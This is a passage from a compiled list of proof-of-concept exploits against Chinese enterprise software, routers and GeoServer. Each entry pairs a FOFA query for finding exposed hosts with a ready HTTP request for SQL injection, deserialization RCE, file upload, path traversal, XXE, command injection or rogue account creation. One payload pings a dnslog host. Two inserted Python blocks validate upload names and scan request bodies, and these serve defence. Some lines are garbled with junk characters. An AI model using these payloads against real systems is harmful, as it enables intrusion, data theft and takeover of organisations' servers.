GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

52. Weaver E-Office (泛微E-Office) json_common.php SQL injection
FOFA: app="泛微-EOffice"
MySQL union-based check: the tfs parameter closes the table identifier with a backtick and appends a UNION SELECT wrapped in /*!50000 ... */ version comments; the md5 value in the returned JSON is the indicator. Content-Length is from the original capture.

POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333

4 {. A2 M# m( B4 _1 A6 v53. 迪普 DPTech VPN Service 任意文件上传1 q3 g. Z+ G/ J: S3 l
FOFA:app="DPtech-SSLVPN"
3 p0 s% A6 r* l/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd% o/ u9 |4 c2 j3 x/ E" Z
& O! w2 t" C8 i; F5 U

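The upload entries (24, 28, 35, 48, 49) and the read entries (47, 53) fail in the same two places: the server trusts a client-supplied name that contains a directory part (\webapps\nc_web\, ./webapps/nc_web/, ../../../) or an extension it should never store, and it compares the path before percent-decoding or only once. The following is an added example, written for this compilation and not taken from any of the products or from the original post, of the two checks a file endpoint should apply; the allowed-extension set and the download root are assumptions for the example, and the test names are the ones used in the requests above.

```python
import posixpath
from urllib.parse import unquote

# Assumption for the example: what an upload endpoint of this kind legitimately
# needs to accept. Anything executable by the container (.jsp, .php, ...) is
# absent on purpose; the stored name should be server-generated in any case.
ALLOWED_EXT = {".txt", ".pdf", ".jpg", ".png", ".cer", ".xlsx"}


def _decode(raw: str) -> str:
    # Decode twice so %2F (entry 53) and a double-encoded %252F both collapse,
    # then fold Windows separators, which entry 24 uses (\webapps\nc_web\...).
    return unquote(unquote(raw)).replace("\\", "/")


def classify_upload_name(raw_name: str):
    """('accept', safe_basename) or ('reject', reason) for a client filename."""
    name = _decode(raw_name)
    if "\x00" in name:
        return ("reject", "NUL byte in name")
    name = posixpath.basename(name)        # drops ./webapps/nc_web/ and ../ prefixes
    name = name.strip().rstrip(".")        # "s.php " (entries 48/49) relies on a trailing space
    if not name:
        return ("reject", "no file name component")
    ext = posixpath.splitext(name)[1].lower()
    if ext not in ALLOWED_EXT:
        return ("reject", "extension %s not allowed" % (ext or "(none)"))
    return ("accept", name)


def classify_download_path(root: str, requ: str):
    """Resolve a client path under root; ('reject', resolved) if it escapes.
    Uses normpath only, so on a real filesystem run os.path.realpath on the
    result as well to cover symlinks inside root."""
    rel = _decode(requ).lstrip("/")        # a leading slash is not an absolute path here
    root = posixpath.normpath(root)
    candidate = posixpath.normpath(posixpath.join(root, rel))
    if candidate != root and not candidate.startswith(root + "/"):
        return ("reject", candidate)
    return ("accept", candidate)


# Constructed inputs: the client names used in the requests above plus benign ones.
UPLOAD_NAMES = [
    "2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt",                 # entry 24, benign extension
    "\\webapps\\nc_web\\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp",  # entry 24, fname field
    "./webapps/nc_web/1.jsp",                          # entry 35
    "s.php ",                                          # entry 48
    "%s.php ",                                         # entry 49
]
DOWNLOAD_PATHS = [
    "../../../etc/passwd",                                     # entry 47
    "/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd",        # entry 53
    "reports/2024/q1.pdf",                                     # constructed, legitimate
]

if __name__ == "__main__":
    for n in UPLOAD_NAMES:
        print(repr(n), "->", classify_upload_name(n))
    for p in DOWNLOAD_PATHS:
        print(repr(p), "->", classify_download_path("/srv/app/files", p))
```

Reducing the client name to a basename is what removes the whole class of traversal and absolute-path tricks at once; the extension allow-list then handles the cases where the name itself is harmless but the stored type is not. For the download side the check must run on the fully decoded, normalised path, which is the step the percent-encoded probe in entry 53 is designed to skip.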
' m! z, \- n- P4 |54. 畅捷通T+ getstorewarehousebystore 远程代码执行  \+ O/ j  Q, c
FOFA:app="畅捷通-TPlus"5 z% G! M$ _# v! j8 _5 u7 k5 w0 Q
第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件
( |* ^1 t: G9 B6 n7 _) b4 g" L"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"( Q  P% t6 h; y; ]6 v: S! M2 Y6 J5 T6 w

; v  {( }* s& F6 A3 i7 Z
& [( n! s. M' S  h7 n" Z( ~完整数据包
3 z$ n; B0 B% T3 M2 MPOST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1* ?$ v  \2 b. C  F1 b0 f( R
Host: x.x.x.x
+ q4 h1 G% d7 n& zUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
$ _: `" y7 G- X) hContent-Length: 593
, h3 w+ w  }. a3 L) B
) I' I* m% }' X- n) o$ {{! x% K2 X" c" p5 T, x( i0 T
"storeID":{
2 k9 E2 @1 r1 Z( J "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
' S( J* K) Q/ j "MethodName":"Start",
+ j( A5 A  z0 L& Q2 z* B' q- {  "ObjectInstance":{9 S1 n4 C! t! V/ w, z2 G3 p
   "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"," P) g5 e  I" @: {
    "StartInfo":{
7 G4 Q6 i$ @( Y1 k5 J   "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
4 i+ n* h* p% w6 g    "FileName":"cmd",
3 t2 l( `! r$ H: F' C$ {    "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
. K  L7 O0 [, J. z! ?    }
4 d( j: Q0 @  @% v9 {  }
7 ^' ~3 K" F' z% F+ K% N, F  }
9 e& i; F" d7 O6 a5 Y% T) r0 @}$ L4 ?5 \3 ]; b; d5 W4 b6 P
4 {9 w" m0 ^! P: G# C+ i: j
7 Y$ e# x8 S+ Q0 v) T- h; r* {
第二步,访问如下url( _9 Q' P) T, E1 ]2 g5 \0 y
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt
1 ~' {# x9 u  Y1 D' c2 A( Q+ W' L; F3 e1 P# ^; g: K
6 F4 i% h9 m4 u
55. Chanjet T+ (畅捷通T+) getdecallusers information disclosure
FOFA: app="畅捷通-TPlus"
Step 1: obtain a cookie through the CheckPassword endpoint:
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword
Step 2: with that cookie, request the user list:
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers

; l4 \! [7 t5 j" J% W/ X& W! z56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
" W6 r5 }5 `  O0 c' R& DFOFA: app="畅捷通-TPlus"7 D% i" t  {' r/ z( C( d2 l
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
, u/ w1 G, Y) AHost: x.x.x.x
, a% w) v/ T7 _User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
- e% X6 `$ ^1 p/ ~! t) v0 {% AContent-Type: application/json2 a0 l3 B$ s* c/ _- Y

5 A9 g5 w, K5 L- d{1 O; e" e* M1 D# X3 S
  "storeID":{
3 Y" g: _4 X; A1 g0 E7 w4 d    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",+ ^" L0 S" F5 F! M( W
   "MethodName":"Start",4 V9 o1 S$ e: s1 E, ]) y; L' h# E
    "ObjectInstance":{
% T; ^8 l' |% Y: C# H) y- A) p       "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"," {& ]4 L' O- o2 m, H1 j: k2 J9 V/ l- F
        "StartInfo": {3 l. J1 R1 o4 }! x7 X% g
           "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",) J" M4 c8 u( y0 A  R+ ^1 H
           "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"; W9 c$ c2 V( e2 s% Y% c3 w% C
       }: q( R+ E. `# h$ ]! _6 N  b: `8 ]$ ~
    }- Q9 A& f+ v6 J6 \9 G# ]. L0 f" I# e
  }
6 s/ P. q. b6 b$ @; l# n7 W}/ M0 ^" U0 p1 }6 O: f& J- s& ?# _

( P. b4 x/ i( _: ^: P& N3 e2 i: z; n) ?% B9 @
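Entry 22 carries its payload as a JNDI lookup inside a JSON string value, entry 23 relies on fastjson honouring a "@type" hint, and entries 54 and 56 rely on the AjaxPro handler honouring a .NET "__type" hint. The following is an added example, written for this compilation and not taken from any of the products or from the original post, of a request-body check that flags all three. It assumes the body is available as text to whatever inspects it (a WAF, a reverse proxy or an application filter); the class names and the sample bodies are copied from the requests above, and the escaped-JNDI sample is a constructed variant of entry 22.

```python
import json
import re

# Type hints from the request bodies above: fastjson honours "@type" (entry 23),
# the AjaxPro handler behind T+ honours .NET "__type" (entries 54 and 56).
DENY_TYPES = {
    "com.alibaba.fastjson.JSONObject",
    "java.net.URL",
    "System.Windows.Data.ObjectDataProvider",
    "System.Diagnostics.Process",
    "System.Diagnostics.ProcessStartInfo",
}

# Matched on the raw text on purpose: the fastjson probe is not valid JSON
# (note the trailing }"" in entry 23), so a strict parser never sees it.
TYPE_HINT_RE = re.compile(r'"(?:@type|__type)"\s*:\s*"([^"]+)"')
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:[^}]*\}", re.IGNORECASE)


def scan_body(body: str) -> list:
    """Return (kind, detail) findings for one request body."""
    findings = []
    for m in TYPE_HINT_RE.finditer(body):
        cls = m.group(1).split(",")[0].strip()    # drop the .NET assembly qualifier
        if cls in DENY_TYPES:
            findings.append(("type-hint", cls))
    raw_jndi = [m.group(0) for m in JNDI_RE.finditer(body)]
    findings.extend(("jndi", hit) for hit in raw_jndi)
    # Second pass over the decoded document, if it parses at all: a lookup
    # written with JSON escapes ("\u0024{jndi:...}") only appears after decoding.
    try:
        doc = json.loads(body)
    except ValueError:
        return findings

    def walk(node):
        if isinstance(node, dict):
            for value in node.values():
                walk(value)
        elif isinstance(node, list):
            for value in node:
                walk(value)
        elif isinstance(node, str) and not raw_jndi:
            for m in JNDI_RE.finditer(node):
                findings.append(("jndi-decoded", m.group(0)))

    walk(doc)
    return findings


# Samples copied from the requests above; ESCAPED_JNDI is constructed.
LOG4J_PROBE = '{"loginName":"${jndi:ldap://dnslog}"}'
ESCAPED_JNDI = '{"loginName":"\\u0024{jndi:ldap://dnslog}"}'
FASTJSON_PROBE = ('{"a":{"@type":"com.alibaba.fastjson.JSONObject",'
                  '{"@type":"java.net.URL","val":"http://DNSLOG"}}""}')
TPLUS_PROBE = (
    '{"storeID":{"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, '
    'Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","MethodName":"Start",'
    '"ObjectInstance":{"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, '
    'Culture=neutral, PublicKeyToken=b77a5c561934e089","StartInfo":{"__type":'
    '"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, '
    'PublicKeyToken=b77a5c561934e089","FileName":"cmd","Arguments":"/c ping 6qevyvmi.dnslog.pw"}}}}'
)

if __name__ == "__main__":
    for name, body in [("log4j", LOG4J_PROBE), ("escaped", ESCAPED_JNDI),
                       ("fastjson", FASTJSON_PROBE), ("tplus", TPLUS_PROBE)]:
        print(name, scan_body(body))
```

Two design points: the raw-text pass comes first because the fastjson probe fails strict parsing and would otherwise be invisible, and the decoded pass only adds findings when the raw pass found nothing, so a single lookup is reported once. The deny list is the set of classes that appear on this page; a production filter would carry the full gadget lists for fastjson and for the .NET serializers instead.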
57. Chanjet T+ (畅捷通T+) keyEdit.aspx SQL injection
FOFA: app="畅捷通-TPlus"
Error-based, SQL Server: 1' and 1=(select @@version) -- forces a conversion of the version string to int, so the SQL Server version banner appears in the error text of the response.

GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

58. 畅捷通 T+ KeyInfoList.aspx SQL injection
FOFA: app="畅捷通-TPlus"
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

59. XETUX software dynamiccontent.properties.xhtml remote code execution
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 192.168.86.128:9090
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Content-Length: 1669
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

PAYLOAD

60. 百卓 Smart management platform importexport.php SQL injection
FOFA: title="Smart管理平台"
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

61. 浙大恩特 customer resource management system fileupload arbitrary file upload
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

8uxssX66eqrqtKObcVa0kid98xa

62. IP-guard WebServer remote command execution
FOFA: "IP-guard" && icon_hash="2030860561"
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then request:

GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x

63. IP-guard WebServer arbitrary file read
IP-guard < 4.82.0609.0
FOFA: icon_hash="2030860561"
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

64. 捷诚 management information system CWSFinanceCommon SQL injection
FOFA: body="/Scripts/EnjoyMsg.js"
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetOSpById xmlns="http://tempuri.org/">
      <sId>1';waitfor delay '0:0:5'--+</sId>
    </GetOSpById>
  </soap:Body>
</soap:Envelope>

65. 优卡特 脸爱云 一脸通 smart management platform 1.0.55.0.0.1 authorization bypass
FOFA: title="欢迎使用脸爱云 一脸通智慧管理平台"
A 200 response means the account test123456/123456 was created.
POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 174

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

66. 万户 ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
FOFA: app="万户ezOFFICE协同管理平台"

GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

The string 6cfe798ba8e5b85feb50164c59f4bec9 appearing on lines 42 and 43 of the response confirms the vulnerability.

67. 万户 ezOFFICE wpsservlet arbitrary file upload
FOFA: app="万户网络-ezOFFICE"
The newdocId and filename parameters set the name of the written file, the dir parameter sets the directory it is written to, and the fileType parameter sets the file type.
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1

--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"

<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--

The written file is then served at /defaultroot/platform/portal/layout/apoxkq.jsp

68. 万户 ezOFFICE wf_printnum.jsp SQL injection
FOFA: app="万户ezOFFICE协同管理平台"
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

69. 万户 ezOFFICE contract_gd.jsp SQL injection
FOFA: app="万户ezOFFICE协同管理平台"
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

70. 万户 ezEIP success command execution
FOFA: app="万户网络-ezEIP"
POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 16702

__VIEWSTATE=PAYLOAD

71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
FOFA: body="PM2项目管理系统BS版增强工具.zip"
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1

72. 致远 (Seeyon) OA getAjaxDataServlet XXE
FOFA: app="致远互联-OA"
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E

73. GeoServer wms remote code execution
FOFA: icon_hash="97540678"
POST /geoserver/wms HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 3

PAYLOAD

74. 致远 (Seeyon) M3-server 6_1sp1 deserialization RCE
FOFA: title="M3-Server"
PAYLOAD

75. Telesquare TLR-2005Ksh router admin.cgi RCE
FOFA: app="TELESQUARE-TLR-2005KSH"
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

GET /cgi-bin/test28256.txt HTTP/1.1
Host: x.x.x.x

76. 新开普 掌上校园 campus service management platform service.action remote command execution
FOFA: title="掌上校园服务管理平台"
POST /service_transport/service.action HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1

{
  "command": "GetFZinfo",
  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
}

GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
Host: x.x.x.x

77. F22 apparel management software UploadHandler.ashx arbitrary file upload
FOFA: body="F22WEB登陆"
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--

78. pkpmbs construction project quality supervision system FileUpload.ashx file upload
FOFA: icon_hash="2001627082"
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--

GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x

79. BYTEVALUE (百为) traffic control router remote command execution
FOFA: BYTEVALUE 智能流控路由器
GET /goform/webRead/open/?path=|id HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

80. 速达天耀 software DesignReportSave.jsp arbitrary file upload
FOFA: app="速达软件-公司产品"
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
